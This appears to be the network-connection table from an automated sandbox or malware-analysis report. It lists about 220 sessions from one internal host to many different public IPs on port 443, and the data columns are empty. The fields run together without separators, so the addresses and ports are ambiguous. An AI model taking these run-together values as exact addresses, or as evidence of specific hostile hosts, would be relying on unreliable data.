                                              17972192.168.2.144199018.146.96.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17973192.168.2.143885665.150.101.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17974192.168.2.1446478193.91.182.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17975192.168.2.1435624205.132.6.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17976192.168.2.143586671.205.58.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17977192.168.2.1441000196.103.17.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17978192.168.2.1447446202.201.34.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17979192.168.2.1447584122.30.15.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17980192.168.2.145125064.148.120.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17981192.168.2.144561435.217.145.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17982192.168.2.145149453.70.186.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17983192.168.2.1451024161.83.136.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17984192.168.2.1445982103.86.13.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17985192.168.2.145891238.230.122.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17986192.168.2.144552660.140.232.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17987192.168.2.144963088.213.4.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17988192.168.2.144806884.237.165.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17989192.168.2.145085099.12.246.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17990192.168.2.1439932113.230.219.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17991192.168.2.1456944177.134.249.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17992192.168.2.1442380117.201.4.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17993192.168.2.143833473.152.168.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17994192.168.2.145807457.171.210.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17995192.168.2.146094053.141.11.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17996192.168.2.145951853.89.68.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17997192.168.2.1435336177.4.118.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17998192.168.2.143972484.65.184.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17999192.168.2.1439330221.230.95.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18000192.168.2.144965861.32.133.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18001192.168.2.1450674198.248.203.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18002192.168.2.1460542148.131.132.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18003192.168.2.1439838217.63.221.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18004192.168.2.1460662106.121.161.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18005192.168.2.144577447.64.226.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18006192.168.2.1445292102.113.227.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18007192.168.2.1445642223.74.141.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18008192.168.2.144747699.25.54.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18009192.168.2.1446190147.41.199.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18010192.168.2.1442146174.55.49.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18011192.168.2.1438606160.149.149.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18012192.168.2.1454126104.35.206.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18013192.168.2.144859085.144.192.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18014192.168.2.145808425.5.182.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18015192.168.2.1438250119.56.102.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18016192.168.2.1440646173.79.214.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18017192.168.2.1440162133.82.167.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18018192.168.2.1437592192.1.135.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18019192.168.2.143817463.34.171.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18020192.168.2.145669227.182.29.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18021192.168.2.145442483.237.154.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18022192.168.2.145045081.170.53.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18023192.168.2.1441748173.81.153.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18024192.168.2.1439590219.115.43.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18025192.168.2.143697435.212.6.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18026192.168.2.1458842193.209.57.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18027192.168.2.1447282171.75.20.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18028192.168.2.144500868.253.77.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18029192.168.2.143763279.250.23.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18030192.168.2.1432862162.206.51.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18031192.168.2.1433284113.193.151.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18032192.168.2.1435140157.94.190.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18033192.168.2.143684864.20.170.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18034192.168.2.145186224.96.242.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18035192.168.2.1451278139.226.191.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18036192.168.2.1439532154.107.189.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18037192.168.2.14521749.121.58.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18038192.168.2.1446138207.18.224.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18039192.168.2.1447266181.228.184.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18040192.168.2.1453726145.17.39.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18041192.168.2.1432922149.207.241.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18042192.168.2.144169647.29.32.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18043192.168.2.14376722.176.233.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18044192.168.2.14449124.249.174.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18045192.168.2.1433926155.116.219.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18046192.168.2.144145879.191.118.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18047192.168.2.1441266142.251.106.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18048192.168.2.1452646136.161.151.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18049192.168.2.1437590109.115.169.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18050192.168.2.144118025.43.3.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18051192.168.2.1456828111.93.192.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18052192.168.2.14566649.17.180.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18053192.168.2.1460518171.200.15.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18054192.168.2.144256890.135.77.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18055192.168.2.146001473.159.158.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18056192.168.2.1456092196.10.36.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18057192.168.2.1444046114.195.140.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18058192.168.2.1451498152.246.86.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18059192.168.2.145523082.58.131.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18060192.168.2.144455057.68.212.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18061192.168.2.14368709.207.251.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18062192.168.2.143280038.121.144.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18063192.168.2.144727027.45.124.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18064192.168.2.1441892135.191.87.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18065192.168.2.145799285.37.85.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18066192.168.2.1447040195.164.199.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18067192.168.2.143500042.102.123.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18068192.168.2.143669253.42.242.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18069192.168.2.1435212211.250.68.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18070192.168.2.145684634.218.212.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18071192.168.2.1437810137.60.111.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18072192.168.2.144183499.169.173.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18073192.168.2.1454200200.237.163.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18074192.168.2.1438858103.170.205.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18075192.168.2.1456732106.201.229.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18076192.168.2.143616843.188.86.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18077192.168.2.1438910223.98.109.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18078192.168.2.14453102.17.3.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18079192.168.2.1453432162.8.148.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18080192.168.2.145323880.30.218.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18081192.168.2.1445942202.194.107.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18082192.168.2.1450880132.253.6.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18083192.168.2.143403024.25.24.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18084192.168.2.1457726112.221.39.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18085192.168.2.145353681.161.174.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18086192.168.2.1438160131.123.208.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18087192.168.2.145101252.28.3.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18088192.168.2.1453168208.61.95.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18089192.168.2.1456114122.52.135.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18090192.168.2.1438928157.64.83.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18091192.168.2.144506491.168.201.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18092192.168.2.1449382160.4.13.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18093192.168.2.145957227.214.183.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18094192.168.2.1454432138.32.20.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18095192.168.2.1457626101.203.174.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18096192.168.2.1454458101.69.213.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18097192.168.2.145372627.152.154.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18098192.168.2.145243479.234.152.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18099192.168.2.144260089.50.16.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18100192.168.2.144743241.198.114.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18101192.168.2.144944881.232.96.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18102192.168.2.1443704168.75.43.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18103192.168.2.145767271.210.6.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18104192.168.2.1449898133.235.20.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18105192.168.2.1437768118.2.158.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18106192.168.2.1436582158.227.199.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18107192.168.2.1448612175.176.47.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18108192.168.2.144345086.248.86.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18109192.168.2.144079899.166.248.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18110192.168.2.1446848194.35.98.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18111192.168.2.143652478.42.191.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18112192.168.2.144795664.97.90.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18113192.168.2.144628097.230.198.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18114192.168.2.1454254123.236.186.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18115192.168.2.1433524102.153.83.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18116192.168.2.144228490.252.58.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18117192.168.2.14539609.60.124.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18118192.168.2.145540431.188.243.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18119192.168.2.1434276180.107.222.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18120192.168.2.1458680156.62.201.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18121192.168.2.1442438143.230.130.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18122192.168.2.144002044.2.48.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18123192.168.2.1455474206.158.50.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18124192.168.2.144544482.167.106.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18125192.168.2.1436302169.108.155.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18126192.168.2.144405096.221.188.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18127192.168.2.144626483.98.30.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18128192.168.2.14591701.241.3.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18129192.168.2.1455806142.139.91.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18130192.168.2.145121271.79.194.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18131192.168.2.1443610181.126.118.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18132192.168.2.1444082203.168.221.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18133192.168.2.1439964171.158.184.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18134192.168.2.1455642167.12.168.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18135192.168.2.1458776219.15.214.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18136192.168.2.1445784172.176.92.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18137192.168.2.145157269.199.96.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18138192.168.2.1443556191.163.120.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18139192.168.2.1444016107.159.79.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18140192.168.2.1451894175.79.35.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18141192.168.2.144850679.161.94.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18142192.168.2.143325875.95.12.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18143192.168.2.1455994161.126.104.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18144192.168.2.1451208209.18.9.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18145192.168.2.1435006171.143.70.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18146192.168.2.14511509.201.67.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18147192.168.2.144346047.81.141.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18148192.168.2.1460014108.232.124.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18149192.168.2.1459214208.161.130.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18150192.168.2.1453726216.102.153.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18151192.168.2.1450972221.130.200.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18152192.168.2.14375048.146.159.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18153192.168.2.144811812.209.67.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18154192.168.2.144678617.221.94.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18155192.168.2.1454854175.188.167.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18156192.168.2.1441880154.76.136.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18157192.168.2.1442382171.12.90.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18158192.168.2.145180861.57.65.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18159192.168.2.143871652.38.216.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18160192.168.2.14409021.177.140.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18161192.168.2.146067046.104.100.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18162192.168.2.1458748169.142.152.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18163192.168.2.143781431.223.1.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18164192.168.2.145252435.1.124.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18165192.168.2.1445676117.192.120.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18166192.168.2.1459756146.44.139.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18167192.168.2.14511621.102.169.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18168192.168.2.1434004206.125.128.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18169192.168.2.144973493.132.252.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18170192.168.2.14558181.213.84.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18171192.168.2.143939857.194.205.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18172192.168.2.145415637.82.147.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18173192.168.2.145589647.192.156.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18174192.168.2.144203489.204.58.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18175192.168.2.1438456173.150.132.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18176192.168.2.144697081.11.104.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18177192.168.2.1450382126.248.1.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18178192.168.2.1438242118.172.7.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18179192.168.2.1458926146.37.233.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18180192.168.2.1442602156.214.198.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18181192.168.2.14477109.169.238.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18182192.168.2.1441028106.187.194.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18183192.168.2.1441548161.158.13.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18184192.168.2.145018019.24.241.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18185192.168.2.1450224143.36.73.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18186192.168.2.1444256116.249.172.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18187192.168.2.1441414158.175.122.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18188192.168.2.143542099.208.127.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18189192.168.2.1458272129.155.168.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18190192.168.2.144519054.116.32.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18191192.168.2.1443900194.237.197.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192192.168.2.1433462162.50.178.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18193192.168.2.144538462.150.35.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
